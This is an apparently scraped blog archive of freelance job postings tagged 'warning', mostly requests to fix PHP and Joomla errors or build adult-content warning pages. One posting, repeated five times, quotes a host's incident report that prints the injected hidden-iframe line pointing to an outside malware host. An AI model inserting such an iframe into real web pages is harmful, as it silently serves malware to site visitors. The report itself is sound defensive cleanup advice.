Archive

Posts Tagged ‘warning’

Fix Html Error And Warning On My Website

January 13th, 2012 Comments off

Hello,

This is my website http://www.456lock.com when you check it at http://www.w3.org/ it shows 17 error and 2 warrning.
I am looking for someone who knows who to fix them. ASAP Please

Joomla Site Giving Security Warning In Ie

December 8th, 2011 Comments off

This Joomla site is displaying fine in Firefox , chrome and safari on mac and PC. However in IE it gives a security warning ” This webpage contains content that will not be delivered using a secure https connection….) if you select yes or not to display content you get 404 error. I need this fixed as soon as possible.

The site is set to be secure and SSL is enable on server …

URL: https://www.shopgarbboutique.com/shop1/

Remove Text From Images (warning: Adult Images)

November 28th, 2011 Comments off

***Warning: project contains nudity***

I have 700 images which I will provide to you in a zip folder. For each one, I need the text that is on the image removed. Here is an example of one that we did.

Before:

http://dl.dropbox.com/u/2900948/195501a.jpg

After:

http://dl.dropbox.com/u/2900948/195501b.jpg

We used the clone tool to remove the text. You can do the same or use a different tool, it is up to you. Please bid for the entire project, all 700 images.

Also, we will prov…

Js/php Code Modification – Quick & Easy Need Asap

September 22nd, 2011 Comments off

I need a small part of a WordPress plugin modified with js and php.

The plugin is a content warning script that pulls up a thickbox and displays a page for the visitor to agree that they are 18 years or older before they enter the site.

Right now it pops up on all pages. I need to modify it so it will only pop up on certain pages/posts/categories.

I have modified the theme options page to include an input box where the admin will enter a list of pagess, post and category id’s separated by commas.

There are basically two lines of code that activate the message on all pages, one in a php function and the other a js function. The first one gets the WordPress url and sends it to the js function where it calls up thickbox and the warning message.

First line of code (php):

echo ‘var wpcw_wpurl = “‘.get_bloginfo(‘wpurl’).’”;’.”n”;

This lines grabs the WordPress url and assigns it to wpcw_wpurl.

The next line of code (js):

tb_show(‘Warning’, wpcw_wpurl + ‘/?wpcw=message&height=300&width=700&modal=true’,false);

This line calls thickbox by appending thickbox settings after the WordPress url.

Instead of applying the content warning to all pages under the site root, I need the script to parse out the WordPress ID from the url, check it against the ID listed in the theme options page and if the current ID is a match, display call the thickbox warning message.

Parsing a WordPress post/page ID from the url is easy:

<?php if (have_posts()) : ?>
<?php while (have_posts()) : the_post(); ?>
<?php
global $post;
echo $post->ID;
?>
<?php endwhile; ?>
<?php endif; ?>

This returns a number like 619.

To parse a WordPress category:

<?php
foreach((get_the_category()) as $category) {
echo $category->cat_ID;
} ?>

This also returns a nice number like 53.

In the theme options page I added a text input filed to capture the ID. The user will add the ID or ID’s and separate them by commas.

You need to write a little code to strip out the commas, toss the ID’s into an array, use the two pieces of code I provided to parse out a post/page id or a category ID and if the ID matches the array call up thickbox and the message.

The WordPress script I am using is Content Warning http://wordpress.org/extend/plugins/content-warning/.

You can see how it works by going to http://www.phonesexv.com

I am working on other parts of the Content Warning script so it will look and act differently if you visit it more than once.

There are only two files you need work with:

main.php and wpcp.js.

It may sound involved but it’s not and should take less than one hour. Its mostly about looking over the code real quick, write an array and strip out the commas, parse the Wprdpress url ID out and check the ID against the array and if the url ID matches, activate the exiting thickbox call.

MAX Budget is: $40.

p.s.
main.php = line 37
wpcw.js = line 11

wpcw-settings.php = line 56-72 (this is the theme options page and where the ID input box is located.

NOTE: the theme options page has a radio button that checks to see if the admin wants the warning message turned off, enabled for all pages or just certain page/post and categories.

The Off feature works, the entire site works you just need to check to see if the certain pages/post and categories button is active and then do as I laid out above.

Admin – List Filter Types

April 6th, 2011 Comments off

Admin-back panel work
i need additional filters added to my user lists on my admin panel.
Under USER MANAGEMENT you will find PERFORMERS, PLANNERS, VENUES, & FANS

filters needed for:
PERFORMERS:
- date created
- last log-in
- country

PLANNERS:
- date created
- last log-in
- city
- state
- country

FANS:
- need ascending & descending arrows for all filter types
- date created
- last log-in
- when “delete user” is clicked….i need a pop-up warning before deleting….right now if i accidentally click “delete user”….that user is deleted without warning
- country

VENUES:
- need ascending & descending arrows for all filter types
- date created
- last log-in
- when “delete user” is clicked….i need a pop-up warning before deleting….right now if i accidentally click “delete user”….that user is deleted without warning
- country

There is a lot of work i need done after this. So if the job is done quickly and professionally i would definitely use you for additional work

Categories: Programming Tags: , , , , , ,

Msacess Vb Code Setwarnings Off Code

April 5th, 2011 Comments off

Hello

I have a MSacess database and I run a Macro that outputs a report to html. But when I run the macro I get a warning and have to click yes/no to continue. I need to remove any warning and continue.

I tried to setwarning off in the in a few places but it does not work. Also I put in some code in Visual basic in a Module as “DoCmd.SetWarnings False” and this still does not stop the warning.

Fix Php Warning:

February 27th, 2010 Comments off

Hello

Im looking for someone to have a look at a website.

But when im uploading to second server im getting php error.

So im looking for someone with good knowledge of php script to selve the error im recieving.

All information will be given to the person how takes the job.

Cheers

Assembly Data Logging

February 8th, 2010 Comments off

Goals:
AVR family processor. Make recommendation of which chip, based on programming needs and pins needed. Power conservation not a concern.
Code in assembly much preferred.
This is not open source code, non disclosure agreement if you bid/accept.
Contact me if you have questions.
This code is for data logging. Not to complicated. Once completed and verified you may be offered additional contract(s) to add on several more features and modules to the program. Line commenting is a must and should be understandable for the inexperienced programmer.
3 sensors:
Take ADC input and convert to a temp/pressure reading:
Comment all lines having to deal with voltage to numeric output display units so that final calibration can be done afterwards.
Each will be one wire sensor which will be connected thru voltage divider of the existing sensor; the existing sensor is an analog gauge using a thermistor.
Voltage range in the ADC to real world readings needs to be adjustable to true reading.
Display label of sensor and reading to the LCD with one of three led back light color. Each sensor will use its own back light color
Cycle thru each sensor every 1 second or less testing for warning levels.
Update LCD display 1-2 second delay between the readings.
Setup warning levels of the sensors for interrupts. This needs to be adjustable as well for the final PCB build. Comment lines so that the calibration can be re-written in the code where needed
Delay all warning level interrupt based on fourth sensors activity. Display only when fourth sensor is active.
Interrupt for warning levels of temppressure and display the current sensor that is in warning range.
Three color backlight one for each sensor.
Flash back light sensor’s color during warning.
Setoff buzzer during any/all warnings.
Cycle display of each sensor reading to LCD every 5-8 seconds except during warning level interrupt. If more then one warning level then each warning needs to be sent to the LCD every 3-5 seconds.
Use SPI for LCD interface: new haven LCD display model #NHD-0216K3Z-FSRGB-FBW
Time and date calendar such as the NJU6355 with program code to update with current time when programming each unit.
Secondary goals: data storage
External memory 1-2 MB non-volatile
Store change in sensor readings every 30-60 seconds with sensor’s reading, name and timedate tags
Store sensor’s data if in warning level, changes every 3-5 seconds.
Using usb jump drive type of storage, when you connect jump drive to port automatic download to the jump drive of all data.
Name the file being downloaded with serial number of unit and date/time
Erase data once transferred
Display message on LCD of downloading progress and unit’s serial number.
Display download complete.
Data can not be erased by the microcontroller on the flash drive. All data on flash drive must be preserved

Categories: Programming Tags: , , , , , ,

Script Installed

February 7th, 2010 Comments off

I need a script installed. I tried installing but I get session start errors. Someone told me that the path to sessions might be wrong but I don’t know how to go about changing it.
I have a cpanel, and whm for reselling hosting.
The script I want installed is a text adexchange script
Warning: session_start() [function.session-start]: open(/tmp/sess_ed1b8b0dd80054ec62bd9c742f51d1a3, O_RDWR) failed: Permission denied (13)

and

Warning: session_start() [function.session-start]: Cannot send session cache limiter – headers already sent

and

Warning: Unknown(): Failed to write session data (files).

Adult Content Warning Pagemod

January 5th, 2010 Comments off

I need a mod for Tubex video sharing script. This module allows you to add an adult Content Warning page to my site
Users will be taken to a warning page before taken to visitor requested., At any point of entry, Users will be asked to confirm to message once per session or interval specified in settings (Could be one a day, week or whatever time you give in the Admin Panel setting

here is the script URL; Tubex video script.
http://www.jmbsoft.com/software/tubex/

here is a demo of what i need.

http://www.adultwatchscript.com/adultwatch-module-warning-page.html

there is a pluging for WP that have something like that .

http://wordpress.org/extend/plugins/content-warning/screenshots/

http://wordpress.org/extend/plugins/content-warning/

Postfix Internal Spammer Mgr

December 4th, 2009 Comments off

We need a script to manage internal spammers in our network.

currently, we are using postfix as our Outgoing RELAY server. We need a script such that:
1. detect that a paticular email address is relaying email from the postfix server and exceed the threshold defined in a text config file
the threshold should be A message / B minutes

2. do appropriate action with such threshold is exceeded. this is defined in the config file. actions include
a. send warning to a particular email address
b. stop sending out these emails. leave those email in the queue.

for 2a, warning should include the messages that is being spammed out.

3. a command (which is a script) shoudl be included to manually do 2b. and undo 2b. so , if i configured the script to send warning as in 2a. then, i can go into the system to stop the sender send our such emails immediate with the script, instead of auto suspend.
and when suspended, i should have a script to resume such.

Warning: Mysql_connect()

November 6th, 2009 Comments off

This is obviously a mysql/php version issue or similar. Here is the location http://66.7.219.210/~zerog/ I need it fixed asap. This is a dedicated server. I am root.

Malware Problem Site

August 27th, 2009 Comments off

Site has been affected with Malware warnign by Google and need to get handled asap this was the review from our host provider what they found when reviewing site after attack as follows

The website “focuzprinting.com” was infected with a malicious iframe code(IFrame Injection Attack). There are lot of files under your domain infected with iframe attack. The files are infected with the code:

iframe src=”http://shopvideofest.cn:8080/index.php” width=120 height=189 style=”visibility: hidden

Since the access log of the domain is rotated, we are unable to find the exact source of his attack. It looks like the attacker used the vulnerability of either the php scripts(oScommerce and wordpress) or the weak permission of your files.

I could see that you are using old version of oScommerce(public_html) and wordpress(public_html/blog) for your site. If you have any local backup of your account, please upload it in your root folder(/home/focugcom) so that we can restore your account from it. Once the account has been restored, please upgrade your oScommerce and wordpress to its latest stable version.

We recommend the following in order stop such attacks in future:

1. Use strong password for your account FTP/Cpanel/mail. Please refer the URL http://strongpasswordgenerator.com to generate strong password.

Some secure password tips would be:

# Don’t use a dictionary word
# Don’t use part of the username
# Keep the password at least 7 characters long
# Have a combination of at least three of:
- lowercase characters (a, b, c)
- uppercase characters (A, B, C)
- numbers (1, 2, 3)
- non-alphanumeric characters (!, %, *, {,

Malware Problem Site

August 27th, 2009 Comments off

Site has been affected with Malware warnign by Google and need to get handled asap this was the review from our host provider what they found when reviewing site after attack as follows

The website “focuzprinting.com” was infected with a malicious iframe code(IFrame Injection Attack). There are lot of files under your domain infected with iframe attack. The files are infected with the code:

iframe src=”http://shopvideofest.cn:8080/index.php” width=120 height=189 style=”visibility: hidden

Since the access log of the domain is rotated, we are unable to find the exact source of his attack. It looks like the attacker used the vulnerability of either the php scripts(oScommerce and wordpress) or the weak permission of your files.

I could see that you are using old version of oScommerce(public_html) and wordpress(public_html/blog) for your site. If you have any local backup of your account, please upload it in your root folder(/home/focugcom) so that we can restore your account from it. Once the account has been restored, please upgrade your oScommerce and wordpress to its latest stable version.

We recommend the following in order stop such attacks in future:

1. Use strong password for your account FTP/Cpanel/mail. Please refer the URL http://strongpasswordgenerator.com to generate strong password.

Some secure password tips would be:

# Don’t use a dictionary word
# Don’t use part of the username
# Keep the password at least 7 characters long
# Have a combination of at least three of:
- lowercase characters (a, b, c)
- uppercase characters (A, B, C)
- numbers (1, 2, 3)
- non-alphanumeric characters (!, %, *, {,

Malware Problem Site

August 27th, 2009 Comments off

Site has been affected with Malware warnign by Google and need to get handled asap this was the review from our host provider what they found when reviewing site after attack as follows

The website “focuzprinting.com” was infected with a malicious iframe code(IFrame Injection Attack). There are lot of files under your domain infected with iframe attack. The files are infected with the code:

iframe src=”http://shopvideofest.cn:8080/index.php” width=120 height=189 style=”visibility: hidden

Since the access log of the domain is rotated, we are unable to find the exact source of his attack. It looks like the attacker used the vulnerability of either the php scripts(oScommerce and wordpress) or the weak permission of your files.

I could see that you are using old version of oScommerce(public_html) and wordpress(public_html/blog) for your site. If you have any local backup of your account, please upload it in your root folder(/home/focugcom) so that we can restore your account from it. Once the account has been restored, please upgrade your oScommerce and wordpress to its latest stable version.

We recommend the following in order stop such attacks in future:

1. Use strong password for your account FTP/Cpanel/mail. Please refer the URL http://strongpasswordgenerator.com to generate strong password.

Some secure password tips would be:

# Don’t use a dictionary word
# Don’t use part of the username
# Keep the password at least 7 characters long
# Have a combination of at least three of:
- lowercase characters (a, b, c)
- uppercase characters (A, B, C)
- numbers (1, 2, 3)
- non-alphanumeric characters (!, %, *, {,

Malware Problem Site

August 27th, 2009 Comments off

Site has been affected with Malware warnign by Google and need to get handled asap this was the review from our host provider what they found when reviewing site after attack as follows

The website “focuzprinting.com” was infected with a malicious iframe code(IFrame Injection Attack). There are lot of files under your domain infected with iframe attack. The files are infected with the code:

iframe src=”http://shopvideofest.cn:8080/index.php” width=120 height=189 style=”visibility: hidden

Since the access log of the domain is rotated, we are unable to find the exact source of his attack. It looks like the attacker used the vulnerability of either the php scripts(oScommerce and wordpress) or the weak permission of your files.

I could see that you are using old version of oScommerce(public_html) and wordpress(public_html/blog) for your site. If you have any local backup of your account, please upload it in your root folder(/home/focugcom) so that we can restore your account from it. Once the account has been restored, please upgrade your oScommerce and wordpress to its latest stable version.

We recommend the following in order stop such attacks in future:

1. Use strong password for your account FTP/Cpanel/mail. Please refer the URL http://strongpasswordgenerator.com to generate strong password.

Some secure password tips would be:

# Don’t use a dictionary word
# Don’t use part of the username
# Keep the password at least 7 characters long
# Have a combination of at least three of:
- lowercase characters (a, b, c)
- uppercase characters (A, B, C)
- numbers (1, 2, 3)
- non-alphanumeric characters (!, %, *, {,

Malware Problem Site

August 27th, 2009 Comments off

Site has been affected with Malware warnign by Google and need to get handled asap this was the review from our host provider what they found when reviewing site after attack as follows

The website “focuzprinting.com” was infected with a malicious iframe code(IFrame Injection Attack). There are lot of files under your domain infected with iframe attack. The files are infected with the code:

iframe src=”http://shopvideofest.cn:8080/index.php” width=120 height=189 style=”visibility: hidden

Since the access log of the domain is rotated, we are unable to find the exact source of his attack. It looks like the attacker used the vulnerability of either the php scripts(oScommerce and wordpress) or the weak permission of your files.

I could see that you are using old version of oScommerce(public_html) and wordpress(public_html/blog) for your site. If you have any local backup of your account, please upload it in your root folder(/home/focugcom) so that we can restore your account from it. Once the account has been restored, please upgrade your oScommerce and wordpress to its latest stable version.

We recommend the following in order stop such attacks in future:

1. Use strong password for your account FTP/Cpanel/mail. Please refer the URL http://strongpasswordgenerator.com to generate strong password.

Some secure password tips would be:

# Don’t use a dictionary word
# Don’t use part of the username
# Keep the password at least 7 characters long
# Have a combination of at least three of:
- lowercase characters (a, b, c)
- uppercase characters (A, B, C)
- numbers (1, 2, 3)
- non-alphanumeric characters (!, %, *, {,

Php Design Fix

August 21st, 2009 Comments off

site in question is www.desertfox.us

I need the css changing ( any txt in the members area or the main page that is currently white i want it to be changed to be black)

I need some fixes with the design

Bottom on the footer on main page
there are three links i wish for these to be placed under the footer dont just make links you need to move what ever php code is used

I have two other fixes for the members area that need to be moved similar to main page but i need this info to be moved within the members page content area rather than under the footer

i then need you to ensusre that the footer image is of the correct size and links up to the rest of the template IE aligned correctly

last fix
when i try to edit a template within the admin area i get an error and the changes do not save. Error seen below i need to fix this so that the templates can be edited in the admin area

Warning: fopen(../templates/mainheader.tpl) [function.fopen]: failed to open stream: Permission denied in /home/desertfo/public_html/admincpanel/admincl/maincontent.php on line 161

Warning: fputs(): supplied argument is not a valid stream resource in /home/desertfo/public_html/admincpanel/admincl/maincontent.php on line 162

Warning: fclose(): supplied argument is not a valid stream resource in /home/desertfo/public_html/admincpanel/admincl/maincontent.php on line 163

Deactivate Virus Warning

August 5th, 2009 Comments off

I need someone to remove a virus warning from our website. This is a fairly simple task. All you have to do insert a google meta tag into the home page, in the <head>section right before the first <body> section.

here is the metatag: <meta name=”verify-v1″ content=”g0+hoGk6Pkg2HvPPgBDm0CKpbjvoDkcugdCUyjsvPV8=” />

Or you may use your own method. As long as the warning page no longer appears when users visit our site.

Experienced programmers only.

I will provide all ftp info.

Thanks.

Joomla Database Error

July 12th, 2009 Comments off

I am hosting a web site: seacoastnh.com. There is a newsletter subscriber pro on the front page — which was working but now I am getting the following error after the newsletter subscriber tries to confirm their subscription they get this:

If you used a valid email address, you would then have to confirm your
subscription. Then you will see the error when you try to confirm.

Here is the text from the error:

Warning: implode() [function.implode
<http://www.seacoastnh.com/function.implode> ]: Invalid arguments passed in
/home/sinned/public_html/includes/router.php on line 301

Warning: Cannot modify header information – headers already sent by (output
started at /home/sinned/public_html/includes/router.php:301) in
/home/sinned/public_html/components/com_sef/sef_incl.php on line 0

Warning: Cannot modify header information – headers already sent by (output
started at /home/sinned/public_html/includes/router.php:301) in
/home/sinned/public_html/components/com_sef/sef_incl.php on line 0

I also have a few other joomla questions about the site and would like to hire a joomla expert to work through these issues with me

Adult Warning Splahs Page

June 14th, 2009 Comments off

for one of my clients i need a adult warning splash page for his adult auction website

its obliged by law to have that so it mus be in the same website style he has now.

there is mod rewrite on the server installed.

Remove Google Malware Warning

June 8th, 2009 Comments off

My website was flagged has having Malware or virus by Google. I have done a search and have no issues on my files.

It still apears on Google and Firefox, Chrome, Safari,….

I need someone that knows how to fix that, remove all the warnings.

Thank you!

Adult Warning Page

June 8th, 2009 Comments off

Hello,

I need ASAP, an UNIQUE text for an adult shop warning page.

With text like: I am at least 18 years old bla bla…

I need it SEO friendly and about 200/300 words, just whenever you feel it’s complete.

Please only bid if you know about this!

Css Styling Adsmanger Error

June 4th, 2009 Comments off

Seemed to have lost the background color to my Joomla site.

The template I am using is from Rocket Theme.

My site

http://www.surreyeasysearch.co.uk/

This is how is should look.

http://demo.rockettheme.com/?template=chromatophore

Slight variations of color to the module class suffixes

Plus a problem with a php error message in adsmanager.

The issue with adsmanager.

http://www.surreyeasysearch.co.uk/index.php?option=com_adsmanager&amp;page=show_category&amp;catid=47&amp;order=0&amp;expand=0&amp;Itemid=84

Warning: opendir(/home/surreyuk/public_html/images/com_adsmanager/plugins/) [function.opendir]: failed to open dir: No such file or directory in /home/surreyuk/public_html/components/com_adsmanager/adsmanager.php on line 199

Warning: readdir(): supplied argument is not a valid Directory resource in /home/surreyuk/public_html/components/com_adsmanager/adsmanager.php on line 201

Warning: closedir(): supplied argument is not a valid Directory resource in /home/surreyuk/public_html/components/com_adsmanager/adsmanager.php on line 211

Need this to be sorted quickly.

Thaanks

Css Styling Adsmanger Error

June 4th, 2009 Comments off

Seemed to have lost the background color to my Joomla site.

The template I am using is from Rocket Theme.

My site

http://www.surreyeasysearch.co.uk/

This is how is should look.

http://demo.rockettheme.com/?template=chromatophore

Slight variations of color to the module class suffixes

Plus a problem with a php error message in adsmanager.

The issue with adsmanager.

http://www.surreyeasysearch.co.uk/index.php?option=com_adsmanager&amp;page=show_category&amp;catid=47&amp;order=0&amp;expand=0&amp;Itemid=84

Warning: opendir(/home/surreyuk/public_html/images/com_adsmanager/plugins/) [function.opendir]: failed to open dir: No such file or directory in /home/surreyuk/public_html/components/com_adsmanager/adsmanager.php on line 199

Warning: readdir(): supplied argument is not a valid Directory resource in /home/surreyuk/public_html/components/com_adsmanager/adsmanager.php on line 201

Warning: closedir(): supplied argument is not a valid Directory resource in /home/surreyuk/public_html/components/com_adsmanager/adsmanager.php on line 211

Need this to be sorted quickly.

Thaanks

Adult Warning Page Design

May 29th, 2009 Comments off

I am looking for someone to create a logo and a splash page for my new site The Freak Tube. I am jus tlooking for some creative text for the logo nothing too fancy. I need the index to include an adult warning and a nice picture of a guy and a female. I need it to look something like http://www.xtube.com but better and differnt.

If this is something you can do please feel free to bid.

Pligg Database Issue

April 20th, 2009 Comments off

Having a major database issue with my Pligg site. Restoring old backups does not help. Here are the errors:

Warning: Error establishing mySQL database connection. Correct user/password? Correct hostname? Database server running? in /home/dizzedc/public_html/libs/db.php on line 87

Warning: mySQL database connection is not active in /home/dizzedc/public_html/libs/db.php on line 125

Warning: Error establishing mySQL database connection. Correct user/password? Correct hostname? Database server running? in /home/dizzedc/public_html/libs/db.php on line 87

Warning: mySQL database connection is not active in /home/dizzedc/public_html/libs/db.php on line 125

Warning: Error establishing mySQL database connection. Correct user/password? Correct hostname? Database server running? in /home/dizzedc/public_html/libs/db.php on line 87

Warning: mySQL database connection is not active in /home/dizzedc/public_html/libs/db.php on line 125

Warning: Error establishing mySQL database connection. Correct user/password? Correct hostname? Database server running? in /home/dizzedc/public_html/libs/db.php on line 87

Warning: mySQL database connection is not active in /home/dizzedc/public_html/libs/db.php on line 125

Warning: Error establishing mySQL database connection. Correct user/password? Correct hostname? Database server running? in /home/dizzedc/public_html/libs/db.php on line 87

Warning: mySQL database connection is not active in /home/dizzedc/public_html/libs/db.php on line 125

Fix Virus Warning On Site

April 1st, 2009 Comments off

We have an active oscommerce site and all of a sudden, when browsers visit the home page using IE and AVG virus scan, they are getting a virus alert warning.

I have attached a screenshot that shows the popup warning and the site URL. I believe there is something in the code of the homepage file that is causing this. We need someone to fix it for us ASAP. We can provide FTP access immediately. Thanks

Bear